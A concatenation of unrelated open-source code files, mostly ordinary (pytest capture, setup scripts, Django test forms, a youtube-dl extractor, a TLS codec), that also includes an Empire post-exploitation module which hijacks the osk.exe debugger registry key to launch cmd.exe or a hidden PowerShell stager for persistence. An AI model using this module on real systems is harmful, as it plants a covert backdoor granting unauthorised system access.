= _expType; self._maxLevel = _maxLevel; self._minAttackPoint = _minAttackPoint; self._maxAttackPoint = _maxAttackPoint; self._attackPointType = _attackPointType; self._minHealthPoint = _minHealthPoint; self._maxHealthPoint = _maxHealthPoint; self._healthPointType = _healthPointType; self._minHealPoint = _minHealPoint; self._maxHealPoint = _maxHealPoint; self._healPointType = _healPointType; self._mainAttribute = _mainAttribute; self._subAttribute = _subAttribute; self._mainType = _mainType; self._subType = _subType; self._skill = _skill; # self._LeaderSKill = _LeaderSKill; # self._AwakeSkill = _AwakeSkill; # self._prevEvolution = _prevEvolution; # self._nextEvolution = _nextEvolution; # self._imageUrl = _imageUrl; # c is euc-kr string ! @classmethod def get_charactor_info_from_string(cls, c): # All String Save the UTF-8 #uni_c = unicode(c,'euc-kr').encode('utf-8') uni_c = c #print get_charactor_num(uni_c), get_charactor_icon_url(uni_c), get_charactor_cost(uni_c), get_charactor_exp(uni_c), get_charactor_status(uni_c), get_charactor_attr(uni_c), get_charactor_type(uni_c) #추후 작업을 계속 하여야 한다. 이부분에 아직 데이터가 정제가 되지 않았음 return cls(_no = get_charactor_num(uni_c), _name= get_charactor_name(uni_c), _cost= get_charactor_cost(uni_c), _exp = get_charactor_exp(uni_c)) @classmethod def get_charactor_info_from_file(cls, _path): # All String Save the UTF-8 f = open(_path) c = f.read() f.close() return cls.get_charactor_info_from_string(c); @classmethod def get_charactor_info_from_url(cls, id_num): # get Monster Data from inven url = "http://m.inven.co.kr/site/pad/monster.php?code=%d"%id_num u = urllib.urlopen(url); c = u.read() u.close() return cls.get_charactor_info_from_string(c); @classmethod def get_charactor_info_from_json(cls, id_num): try: #print 'get %d'%id_num rst = get_monster_default_data(id_num) m = cls(_no=rst['monstercode'], _name=rst['monstername'].encode('utf-8'), _maxLevel=rst['maxlevel'], _minAttackPoint=rst['attack'], _maxAttackPoint=rst['maxattack'], _attackPointType = float(rst['attackmod']) , _minHealthPoint= rst['hp'], _maxHealthPoint= rst['maxhp'] , _healthPointType=float(rst['hpmod']), _minHealPoint=rst['recovery'], _maxHealPoint=rst['maxrecovery'], _healPointType=float(rst['recoverymod']), _exp = rst['exp'], _expType = rst['exptype']) ''' 추후 추가해야 할 부분들 self._skill = _skill; # self._LeaderSKill = _LeaderSKill; # self._AwakeSkill = _AwakeSkill; # self._prevEvolution = _prevEvolution; # self._nextEvolution = _nextEvolution; # ''' url = "http://m.inven.co.kr/site/pad/monster.php?code=%d"%id_num u = urllib.urlopen(url); c = u.read() u.close() m._cost = get_charactor_cost(c); attr = get_charactor_attr(c); if len(attr) == 1: m._mainAttribute = attr[0] elif len(attr) == 2: m._mainAttribute = attr[0] m._subAttribute = attr[1] types = get_charactor_type(c); if len(types) == 1: m._mainType = types[0] elif len(types) == 2: m._mainType = types[0] m._subType = types[1] m._imageUrl = get_charactor_icon_url(c); return m except Exception as e: print "Not find (%d) monster"%id_num print 'Error - ', e return None; def showData(self): print "id:",self._no print "name: ",self._name print "cost: ", self._cost print "exp: ", self._exp print "attribute: ",self._mainAttribute, self._subAttribute print "type: ", self._mainType, self._subType # 해당 lv에 몬스터의 hp, attack, recovery 를 구한다. def get_monster_status(self,lv,HPplusEgg=0,AttackPlusEgg=0,RecoveryPlusEgg=0): if lv > self._maxLevel: lv = self._maxLevel calc = lambda minVal,maxVal,level,maxLevel,mod:int(round(float(minVal) + (float(maxVal) - float(minVal))*pow((float(level) - 1) / (float(maxLevel) - 1) , float(mod)))) hp = calc(self._minHealthPoint, self._maxHealthPoint, lv, self._maxLevel, self._healthPointType) + HPplusEgg*10 attack = calc(self._minAttackPoint, self._maxAttackPoint, lv, self._maxLevel, self._attackPointType) + AttackPlusEgg*5 recovery = calc(self._minHealPoint, self._maxHealPoint, lv, self._maxLevel, self._healPointType) + RecoveryPlusEgg*3 return hp, attack, recovery
bobuk/urpc
refs/heads/master
setup.py
1
from setuptools import setup, find_packages setup(name="urpc", version="0.3.4", py_modules=['urpc', 'aiourpc'], url="http://github.com/bobuk/urpc", author="Grigory Bakunov", author_email='thebobuk@ya.ru', description='uRPC is oversimplistic RPC over Redis', install_requires=[ 'redis' ], scripts = ['scripts/urpc-cli'], classifiers = [ "Programming Language :: Python", "Programming Language :: Python :: 3", "Development Status :: 4 - Beta", "Environment :: Other Environment", "Intended Audience :: Developers", "Operating System :: OS Independent", "Topic :: Software Development :: Libraries :: Python Modules", ], )
rnestler/servo
refs/heads/master
tests/wpt/web-platform-tests/tools/pytest/_pytest/capture.py
178
""" per-test stdout/stderr capturing mechanism. """ from __future__ import with_statement import sys import os from tempfile import TemporaryFile import py import pytest from py.io import TextIO unicode = py.builtin.text patchsysdict = {0: 'stdin', 1: 'stdout', 2: 'stderr'} def pytest_addoption(parser): group = parser.getgroup("general") group._addoption( '--capture', action="store", default="fd" if hasattr(os, "dup") else "sys", metavar="method", choices=['fd', 'sys', 'no'], help="per-test capturing method: one of fd|sys|no.") group._addoption( '-s', action="store_const", const="no", dest="capture", help="shortcut for --capture=no.") @pytest.hookimpl(hookwrapper=True) def pytest_load_initial_conftests(early_config, parser, args): _readline_workaround() ns = early_config.known_args_namespace pluginmanager = early_config.pluginmanager capman = CaptureManager(ns.capture) pluginmanager.register(capman, "capturemanager") # make sure that capturemanager is properly reset at final shutdown early_config.add_cleanup(capman.reset_capturings) # make sure logging does not raise exceptions at the end def silence_logging_at_shutdown(): if "logging" in sys.modules: sys.modules["logging"].raiseExceptions = False early_config.add_cleanup(silence_logging_at_shutdown) # finally trigger conftest loading but while capturing (issue93) capman.init_capturings() outcome = yield out, err = capman.suspendcapture() if outcome.excinfo is not None: sys.stdout.write(out) sys.stderr.write(err) class CaptureManager: def __init__(self, method): self._method = method def _getcapture(self, method): if method == "fd": return MultiCapture(out=True, err=True, Capture=FDCapture) elif method == "sys": return MultiCapture(out=True, err=True, Capture=SysCapture) elif method == "no": return MultiCapture(out=False, err=False, in_=False) else: raise ValueError("unknown capturing method: %r" % method) def init_capturings(self): assert not hasattr(self, "_capturing") self._capturing = self._getcapture(self._method) self._capturing.start_capturing() def reset_capturings(self): cap = self.__dict__.pop("_capturing", None) if cap is not None: cap.pop_outerr_to_orig() cap.stop_capturing() def resumecapture(self): self._capturing.resume_capturing() def suspendcapture(self, in_=False): self.deactivate_funcargs() cap = getattr(self, "_capturing", None) if cap is not None: try: outerr = cap.readouterr() finally: cap.suspend_capturing(in_=in_) return outerr def activate_funcargs(self, pyfuncitem): capfuncarg = pyfuncitem.__dict__.pop("_capfuncarg", None) if capfuncarg is not None: capfuncarg._start() self._capfuncarg = capfuncarg def deactivate_funcargs(self): capfuncarg = self.__dict__.pop("_capfuncarg", None) if capfuncarg is not None: capfuncarg.close() @pytest.hookimpl(hookwrapper=True) def pytest_make_collect_report(self, collector): if isinstance(collector, pytest.File): self.resumecapture() outcome = yield out, err = self.suspendcapture() rep = outcome.get_result() if out: rep.sections.append(("Captured stdout", out)) if err: rep.sections.append(("Captured stderr", err)) else: yield @pytest.hookimpl(hookwrapper=True) def pytest_runtest_setup(self, item): self.resumecapture() yield self.suspendcapture_item(item, "setup") @pytest.hookimpl(hookwrapper=True) def pytest_runtest_call(self, item): self.resumecapture() self.activate_funcargs(item) yield #self.deactivate_funcargs() called from suspendcapture() self.suspendcapture_item(item, "call") @pytest.hookimpl(hookwrapper=True) def pytest_runtest_teardown(self, item): self.resumecapture() yield self.suspendcapture_item(item, "teardown") @pytest.hookimpl(tryfirst=True) def pytest_keyboard_interrupt(self, excinfo): self.reset_capturings() @pytest.hookimpl(tryfirst=True) def pytest_internalerror(self, excinfo): self.reset_capturings() def suspendcapture_item(self, item, when): out, err = self.suspendcapture() item.add_report_section(when, "stdout", out) item.add_report_section(when, "stderr", err) error_capsysfderror = "cannot use capsys and capfd at the same time" @pytest.fixture def capsys(request): """enables capturing of writes to sys.stdout/sys.stderr and makes captured output available via ``capsys.readouterr()`` method calls which return a ``(out, err)`` tuple. """ if "capfd" in request._funcargs: raise request.raiseerror(error_capsysfderror) request.node._capfuncarg = c = CaptureFixture(SysCapture) return c @pytest.fixture def capfd(request): """enables capturing of writes to file descriptors 1 and 2 and makes captured output available via ``capfd.readouterr()`` method calls which return a ``(out, err)`` tuple. """ if "capsys" in request._funcargs: request.raiseerror(error_capsysfderror) if not hasattr(os, 'dup'): pytest.skip("capfd funcarg needs os.dup") request.node._capfuncarg = c = CaptureFixture(FDCapture) return c class CaptureFixture: def __init__(self, captureclass): self.captureclass = captureclass def _start(self): self._capture = MultiCapture(out=True, err=True, in_=False, Capture=self.captureclass) self._capture.start_capturing() def close(self): cap = self.__dict__.pop("_capture", None) if cap is not None: self._outerr = cap.pop_outerr_to_orig() cap.stop_capturing() def readouterr(self): try: return self._capture.readouterr() except AttributeError: return self._outerr def safe_text_dupfile(f, mode, default_encoding="UTF8"): """ return a open text file object that's a duplicate of f on the FD-level if possible. """ encoding = getattr(f, "encoding", None) try: fd = f.fileno() except Exception: if "b" not in getattr(f, "mode", "") and hasattr(f, "encoding"): # we seem to have a text stream, let's just use it return f else: newfd = os.dup(fd) if "b" not in mode: mode += "b" f = os.fdopen(newfd, mode, 0) # no buffering return EncodedFile(f, encoding or default_encoding) class EncodedFile(object): errors = "strict" # possibly needed by py3 code (issue555) def __init__(self, buffer, encoding): self.buffer = buffer self.encoding = encoding def write(self, obj): if isinstance(obj, unicode): obj = obj.encode(self.encoding, "replace") self.buffer.write(obj) def writelines(self, linelist): data = ''.join(linelist) self.write(data) def __getattr__(self, name): return getattr(object.__getattribute__(self, "buffer"), name) class MultiCapture(object): out = err = in_ = None def __init__(self, out=True, err=True, in_=True, Capture=None): if in_: self.in_ = Capture(0) if out: self.out = Capture(1) if err: self.err = Capture(2) def start_capturing(self): if self.in_: self.in_.start() if self.out: self.out.start() if self.err: self.err.start() def pop_outerr_to_orig(self): """ pop current snapshot out/err capture and flush to orig streams. """ out, err = self.readouterr() if out: self.out.writeorg(out) if err: self.err.writeorg(err) return out, err def suspend_capturing(self, in_=False): if self.out: self.out.suspend() if self.err: self.err.suspend() if in_ and self.in_: self.in_.suspend() self._in_suspended = True def resume_capturing(self): if self.out: self.out.resume() if self.err: self.err.resume() if hasattr(self, "_in_suspended"): self.in_.resume() del self._in_suspended def stop_capturing(self): """ stop capturing and reset capturing streams """ if hasattr(self, '_reset'): raise ValueError("was already stopped") self._reset = True if self.out: self.out.done() if self.err: self.err.done() if self.in_: self.in_.done() def readouterr(self): """ return snapshot unicode value of stdout/stderr capturings. """ return (self.out.snap() if self.out is not None else "", self.err.snap() if self.err is not None else "") class NoCapture: __init__ = start = done = suspend = resume = lambda *args: None class FDCapture: """ Capture IO to/from a given os-level filedescriptor. """ def __init__(self, targetfd, tmpfile=None): self.targetfd = targetfd try: self.targetfd_save = os.dup(self.targetfd) except OSError: self.start = lambda: None self.done = lambda: None else: if targetfd == 0: assert not tmpfile, "cannot set tmpfile with stdin" tmpfile = open(os.devnull, "r") self.syscapture = SysCapture(targetfd) else: if tmpfile is None: f = TemporaryFile() with f: tmpfile = safe_text_dupfile(f, mode="wb+") if targetfd in patchsysdict: self.syscapture = SysCapture(targetfd, tmpfile) else: self.syscapture = NoCapture() self.tmpfile = tmpfile self.tmpfile_fd = tmpfile.fileno() def __repr__(self): return "<FDCapture %s oldfd=%s>" % (self.targetfd, self.targetfd_save) def start(self): """ Start capturing on targetfd using memorized tmpfile. """ try: os.fstat(self.targetfd_save) except (AttributeError, OSError): raise ValueError("saved filedescriptor not valid anymore") os.dup2(self.tmpfile_fd, self.targetfd) self.syscapture.start() def snap(self): f = self.tmpfile f.seek(0) res = f.read() if res: enc = getattr(f, "encoding", None) if enc and isinstance(res, bytes): res = py.builtin._totext(res, enc, "replace") f.truncate(0) f.seek(0) return res return '' def done(self): """ stop capturing, restore streams, return original capture file, seeked to position zero. """ targetfd_save = self.__dict__.pop("targetfd_save") os.dup2(targetfd_save, self.targetfd) os.close(targetfd_save) self.syscapture.done() self.tmpfile.close() def suspend(self): self.syscapture.suspend() os.dup2(self.targetfd_save, self.targetfd) def resume(self): self.syscapture.resume() os.dup2(self.tmpfile_fd, self.targetfd) def writeorg(self, data): """ write to original file descriptor. """ if py.builtin._istext(data): data = data.encode("utf8") # XXX use encoding of original stream os.write(self.targetfd_save, data) class SysCapture: def __init__(self, fd, tmpfile=None): name = patchsysdict[fd] self._old = getattr(sys, name) self.name = name if tmpfile is None: if name == "stdin": tmpfile = DontReadFromInput() else: tmpfile = TextIO() self.tmpfile = tmpfile def start(self): setattr(sys, self.name, self.tmpfile) def snap(self): f = self.tmpfile res = f.getvalue() f.truncate(0) f.seek(0) return res def done(self): setattr(sys, self.name, self._old) del self._old self.tmpfile.close() def suspend(self): setattr(sys, self.name, self._old) def resume(self): setattr(sys, self.name, self.tmpfile) def writeorg(self, data): self._old.write(data) self._old.flush() class DontReadFromInput: """Temporary stub class. Ideally when stdin is accessed, the capturing should be turned off, with possibly all data captured so far sent to the screen. This should be configurable, though, because in automated test runs it is better to crash than hang indefinitely. """ encoding = None def read(self, *args): raise IOError("reading from stdin while output is captured") readline = read readlines = read __iter__ = read def fileno(self): raise ValueError("redirected Stdin is pseudofile, has no fileno()") def isatty(self): return False def close(self): pass def _readline_workaround(): """ Ensure readline is imported so that it attaches to the correct stdio handles on Windows. Pdb uses readline support where available--when not running from the Python prompt, the readline module is not imported until running the pdb REPL. If running py.test with the --pdb option this means the readline module is not imported until after I/O capture has been started. This is a problem for pyreadline, which is often used to implement readline support on Windows, as it does not attach to the correct handles for stdout and/or stdin if they have been redirected by the FDCapture mechanism. This workaround ensures that readline is imported before I/O capture is setup so that it can attach to the actual stdin/out for the console. See https://github.com/pytest-dev/pytest/pull/1281 """ if not sys.platform.startswith('win32'): return try: import readline # noqa except ImportError: pass
kubeflow/kfp-tekton-backend
refs/heads/master
sdk/python/tests/compiler/testdata/volume.py
1
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import kfp.dsl as dsl from kubernetes import client as k8s_client @dsl.pipeline( name='Volume', description='A pipeline with volume.' ) def volume_pipeline(): op1 = dsl.ContainerOp( name='download', image='google/cloud-sdk', command=['sh', '-c'], arguments=['ls | tee /tmp/results.txt'], file_outputs={'downloaded': '/tmp/results.txt'}) \ .add_volume(k8s_client.V1Volume(name='gcp-credentials', secret=k8s_client.V1SecretVolumeSource( secret_name='user-gcp-sa'))) \ .add_volume_mount(k8s_client.V1VolumeMount( mount_path='/secret/gcp-credentials', name='gcp-credentials')) \ .add_env_variable(k8s_client.V1EnvVar( name='GOOGLE_APPLICATION_CREDENTIALS', value='/secret/gcp-credentials/user-gcp-sa.json')) \ .add_env_variable(k8s_client.V1EnvVar(name='Foo', value='bar')) op2 = dsl.ContainerOp( name='echo', image='library/bash', command=['sh', '-c'], arguments=['echo %s' % op1.output])
PythonCharmers/orange3
refs/heads/master
Orange/misc/datasets.py
25
import json import os class _DatasetInfo(dict): def __init__(self): super().__init__(self) datasets_folder = os.path.join(os.path.dirname(__file__), '../datasets') with open(os.path.join(datasets_folder, 'datasets.info'), 'r') as f: info = json.load(f) self.update(info) self.__dict__.update(info)
LethusTI/supportcenter
refs/heads/master
vendor/django/django/contrib/formtools/tests/forms.py
99
from django import forms from django.contrib.formtools.wizard import FormWizard from django.http import HttpResponse class Page1(forms.Form): name = forms.CharField(max_length=100) thirsty = forms.NullBooleanField() class Page2(forms.Form): address1 = forms.CharField(max_length=100) address2 = forms.CharField(max_length=100) class Page3(forms.Form): random_crap = forms.CharField(max_length=100) class ContactWizard(FormWizard): def done(self, request, form_list): return HttpResponse("") class TestForm(forms.Form): field1 = forms.CharField() field1_ = forms.CharField() bool1 = forms.BooleanField(required=False) class HashTestForm(forms.Form): name = forms.CharField() bio = forms.CharField() class HashTestBlankForm(forms.Form): name = forms.CharField(required=False) bio = forms.CharField(required=False) class WizardPageOneForm(forms.Form): field = forms.CharField() class WizardPageTwoForm(forms.Form): field = forms.CharField() class WizardPageTwoAlternativeForm(forms.Form): field = forms.CharField() class WizardPageThreeForm(forms.Form): field = forms.CharField()
Perkville/django-tastypie
refs/heads/master
setup.py
13
#!/usr/bin/env python # -*- coding: utf-8 -*- try: from setuptools import setup except ImportError: from ez_setup import use_setuptools use_setuptools() from setuptools import setup from tastypie import __version__ setup( name='django-tastypie', version=__version__, description='A flexible & capable API layer for Django.', author='Daniel Lindsley', author_email='daniel@toastdriven.com', url='https://github.com/django-tastypie/django-tastypie', long_description=open('README.rst', 'r').read(), packages=[ 'tastypie', 'tastypie.utils', 'tastypie.management', 'tastypie.management.commands', 'tastypie.migrations', 'tastypie.contrib', 'tastypie.contrib.gis', 'tastypie.contrib.contenttypes', ], package_data={ 'tastypie': ['templates/tastypie/*'], }, zip_safe=False, requires=[ 'python_mimeparse(>=0.1.4, !=1.5)', 'dateutil(>=1.5, !=2.0)', ], install_requires=[ 'python-mimeparse >= 0.1.4, != 1.5', 'python-dateutil >= 1.5, != 2.0', ], tests_require=['mock', 'PyYAML', 'lxml', 'defusedxml'], classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', 'Topic :: Utilities' ], )
linjoahow/2015cdaa-w11
refs/heads/master
static/Brython3.1.1-20150328-091302/Lib/gc.py
743
"""This module provides access to the garbage collector for reference cycles. enable() -- Enable automatic garbage collection. disable() -- Disable automatic garbage collection. isenabled() -- Returns true if automatic collection is enabled. collect() -- Do a full collection right now. get_count() -- Return the current collection counts. set_debug() -- Set debugging flags. get_debug() -- Get debugging flags. set_threshold() -- Set the collection thresholds. get_threshold() -- Return the current the collection thresholds. get_objects() -- Return a list of all objects tracked by the collector. is_tracked() -- Returns true if a given object is tracked. get_referrers() -- Return the list of objects that refer to an object. get_referents() -- Return the list of objects that an object refers to. """ DEBUG_COLLECTABLE = 2 DEBUG_LEAK = 38 DEBUG_SAVEALL = 32 DEBUG_STATS = 1 DEBUG_UNCOLLECTABLE = 4 class __loader__: pass callbacks = [] def collect(*args,**kw): """collect([generation]) -> n With no arguments, run a full collection. The optional argument may be an integer specifying which generation to collect. A ValueError is raised if the generation number is invalid. The number of unreachable objects is returned. """ pass def disable(*args,**kw): """disable() -> None Disable automatic garbage collection. """ pass def enable(*args,**kw): """enable() -> None Enable automatic garbage collection. """ pass garbage = [] def get_count(*args,**kw): """get_count() -> (count0, count1, count2) Return the current collection counts """ pass def get_debug(*args,**kw): """get_debug() -> flags Get the garbage collection debugging flags. """ pass def get_objects(*args,**kw): """get_objects() -> [...] Return a list of objects tracked by the collector (excluding the list returned). """ pass def get_referents(*args,**kw): """get_referents(*objs) -> list Return the list of objects that are directly referred to by objs.""" pass def get_referrers(*args,**kw): """get_referrers(*objs) -> list Return the list of objects that directly refer to any of objs.""" pass def get_threshold(*args,**kw): """get_threshold() -> (threshold0, threshold1, threshold2) Return the current collection thresholds """ pass def is_tracked(*args,**kw): """is_tracked(obj) -> bool Returns true if the object is tracked by the garbage collector. Simple atomic objects will return false. """ pass def isenabled(*args,**kw): """isenabled() -> status Returns true if automatic garbage collection is enabled. """ pass def set_debug(*args,**kw): """set_debug(flags) -> None Set the garbage collection debugging flags. Debugging information is written to sys.stderr. flags is an integer and can have the following bits turned on: DEBUG_STATS - Print statistics during collection. DEBUG_COLLECTABLE - Print collectable objects found. DEBUG_UNCOLLECTABLE - Print unreachable but uncollectable objects found. DEBUG_SAVEALL - Save objects to gc.garbage rather than freeing them. DEBUG_LEAK - Debug leaking programs (everything but STATS). """ pass def set_threshold(*args,**kw): """set_threshold(threshold0, [threshold1, threshold2]) -> None Sets the collection thresholds. Setting threshold0 to zero disables collection. """ pass
CaledoniaProject/Empire
refs/heads/master
lib/modules/persistence/debugger/osk.py
20
from lib.common import helpers class Module: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Invoke-OSK', 'Author': ['@harmj0y'], 'Description': ("Sets the debugger for the on-screen keyboard (osk.exe) to be cmd.exe, " "another binary of your choice, or a listern stager. This can be launched from " "the ease-of-access center."), 'Background' : False, 'OutputExtension' : None, 'NeedsAdmin' : True, 'OpsecSafe' : False, 'MinPSVersion' : '2', 'Comments': [ ] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent' : { 'Description' : 'Agent to run module on.', 'Required' : True, 'Value' : '' }, 'Listener' : { 'Description' : 'Listener to use.', 'Required' : False, 'Value' : '' }, 'RegPath' : { 'Description' : 'Registry location to store the script code. Last element is the key name.', 'Required' : False, 'Value' : 'HKLM:Software\Microsoft\Network\debug' }, 'Cleanup' : { 'Description' : 'Switch. Disable the osk.exe debugger.', 'Required' : False, 'Value' : '' }, 'Binary' : { 'Description' : 'Binary to set for the debugger.', 'Required' : False, 'Value' : 'C:\Windows\System32\cmd.exe' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self): # management options cleanup = self.options['Cleanup']['Value'] binary = self.options['Binary']['Value'] listenerName = self.options['Listener']['Value'] # storage options regPath = self.options['RegPath']['Value'] statusMsg = "" locationString = "" if cleanup.lower() == 'true': # the registry command to disable the debugger for osk.exe script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe';'osk.exe debugger removed.'" return script if listenerName != '': # if there's a listener specified, generate a stager and store it if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner launcher = self.mainMenu.stagers.generate_launcher(listenerName) encScript = launcher.split(" ")[-1] # statusMsg += "using listener " + listenerName path = "\\".join(regPath.split("\\")[0:-1]) name = regPath.split("\\")[-1] statusMsg += " stored in " + regPath + "." script = "$RegPath = '"+regPath+"';" script += "$parts = $RegPath.split('\\');" script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';" script += "$name = $parts[-1];" script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";" # note where the script is stored locationString = "$((gp "+path+" "+name+")."+name+")" script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'osk.exe debugger set to trigger stager for listener "+listenerName+"'" else: # the registry command to set the debugger for osk.exe to be the binary path specified script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe' -Name Debugger -Value '"+binary+"';'osk.exe debugger set to "+binary+"'" return script
dmcarvalho/KhartesTools
refs/heads/master
test/test_resources.py
1
# coding=utf-8 """Resources test. .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ __author__ = 'diego@khartes.com.br' __date__ = '2016-09-11' __copyright__ = 'Copyright 2016, Diego Moreira / Khartes Geoinformação' import unittest from PyQt4.QtGui import QIcon class KhartesToolsDialogTest(unittest.TestCase): """Test rerources work.""" def setUp(self): """Runs before each test.""" pass def tearDown(self): """Runs after each test.""" pass def test_icon_png(self): """Test we can click OK.""" path = ':/plugins/KhartesTools/icon.png' icon = QIcon(path) self.assertFalse(icon.isNull()) if __name__ == "__main__": suite = unittest.makeSuite(KhartesToolsResourcesTest) runner = unittest.TextTestRunner(verbosity=2) runner.run(suite)
hoatle/odoo
refs/heads/8.0
addons/website_event_track/controllers/__init__.py
382
import event
codesparkle/youtube-dl
refs/heads/master
youtube_dl/extractor/voicerepublic.py
20
from __future__ import unicode_literals import re from .common import InfoExtractor from ..compat import ( compat_str, compat_urlparse, ) from ..utils import ( ExtractorError, determine_ext, int_or_none, sanitized_Request, ) class VoiceRepublicIE(InfoExtractor): _VALID_URL = r'https?://voicerepublic\.com/(?:talks|embed)/(?P<id>[0-9a-z-]+)' _TESTS = [{ 'url': 'http://voicerepublic.com/talks/watching-the-watchers-building-a-sousveillance-state', 'md5': 'b9174d651323f17783000876347116e3', 'info_dict': { 'id': '2296', 'display_id': 'watching-the-watchers-building-a-sousveillance-state', 'ext': 'm4a', 'title': 'Watching the Watchers: Building a Sousveillance State', 'description': 'Secret surveillance programs have metadata too. The people and companies that operate secret surveillance programs can be surveilled.', 'thumbnail': 're:^https?://.*\.(?:png|jpg)$', 'duration': 1800, 'view_count': int, } }, { 'url': 'http://voicerepublic.com/embed/watching-the-watchers-building-a-sousveillance-state', 'only_matching': True, }] def _real_extract(self, url): display_id = self._match_id(url) req = sanitized_Request( compat_urlparse.urljoin(url, '/talks/%s' % display_id)) # Older versions of Firefox get redirected to an "upgrade browser" page req.add_header('User-Agent', 'youtube-dl') webpage = self._download_webpage(req, display_id) if '>Queued for processing, please stand by...<' in webpage: raise ExtractorError( 'Audio is still queued for processing', expected=True) config = self._search_regex( r'(?s)return ({.+?});\s*\n', webpage, 'data', default=None) data = self._parse_json(config, display_id, fatal=False) if config else None if data: title = data['title'] description = data.get('teaser') talk_id = compat_str(data.get('talk_id') or display_id) talk = data['talk'] duration = int_or_none(talk.get('duration')) formats = [{ 'url': compat_urlparse.urljoin(url, talk_url), 'format_id': format_id, 'ext': determine_ext(talk_url) or format_id, 'vcodec': 'none', } for format_id, talk_url in talk['links'].items()] else: title = self._og_search_title(webpage) description = self._html_search_regex( r"(?s)<div class='talk-teaser'[^>]*>(.+?)</div>", webpage, 'description', fatal=False) talk_id = self._search_regex( [r"id='jc-(\d+)'", r"data-shareable-id='(\d+)'"], webpage, 'talk id', default=None) or display_id duration = None player = self._search_regex( r"class='vr-player jp-jplayer'([^>]+)>", webpage, 'player') formats = [{ 'url': compat_urlparse.urljoin(url, talk_url), 'format_id': format_id, 'ext': determine_ext(talk_url) or format_id, 'vcodec': 'none', } for format_id, talk_url in re.findall(r"data-([^=]+)='([^']+)'", player)] self._sort_formats(formats) thumbnail = self._og_search_thumbnail(webpage) view_count = int_or_none(self._search_regex( r"class='play-count[^']*'>\s*(\d+) plays", webpage, 'play count', fatal=False)) return { 'id': talk_id, 'display_id': display_id, 'title': title, 'description': description, 'thumbnail': thumbnail, 'duration': duration, 'view_count': view_count, 'formats': formats, }
xsynergy510x/android_external_chromium_org
refs/heads/cm-12.1
third_party/tlslite/tlslite/utils/codec.py
115
# Author: Trevor Perrin # See the LICENSE file for legal information regarding use of this file. """Classes for reading/writing binary data (such as TLS records).""" from .compat import * class Writer(object): def __init__(self): self.bytes = bytearray(0) def add(self, x, length): self.bytes += bytearray(length) newIndex = len(self.bytes) - 1 for count in range(length): self.bytes[newIndex] = x & 0xFF x >>= 8 newIndex -= 1 def addFixSeq(self, seq, length): for e in seq: self.add(e, length) def addVarSeq(self, seq, length, lengthLength): self.add(len(seq)*length, lengthLength) for e in seq: self.add(e, length) class Parser(object): def __init__(self, bytes): self.bytes = bytes self.index = 0 def get(self, length): if self.index + length > len(self.bytes): raise SyntaxError() x = 0 for count in range(length): x <<= 8 x |= self.bytes[self.index] self.index += 1 return x def getFixBytes(self, lengthBytes): bytes = self.bytes[self.index : self.index+lengthBytes] self.index += lengthBytes return bytes def getVarBytes(self, lengthLength): lengthBytes = self.get(lengthLength) return self.getFixBytes(lengthBytes) def getFixList(self, length, lengthList): l = [0] * lengthList for x in range(lengthList): l[x] = self.get(length) return l def getVarList(self, length, lengthLength): lengthList = self.get(lengthLength) if lengthList % length != 0: raise SyntaxError() lengthList = lengthList // length l = [0] * lengthList for x in range(lengthList): l[x] = self.get(length) return l def startLengthCheck(self, lengthLength): self.lengthCheck = self.get(lengthLength) self.indexCheck = self.index def setLengthCheck(self, length): self.lengthCheck = length self.indexCheck = self.index def stopLengthCheck(self): if (self.index - self.indexCheck) != self.lengthCheck: raise SyntaxError() def atLengthCheck(self): if (self.index - self.indexCheck) < self.lengthCheck: return False elif (self.index - self.indexCheck) == self.lengthCheck: return True else: raise SyntaxError()
scbash/xbmc
refs/heads/master
tools/darwin/Support/GenerateMissingImages-tvos.py
10
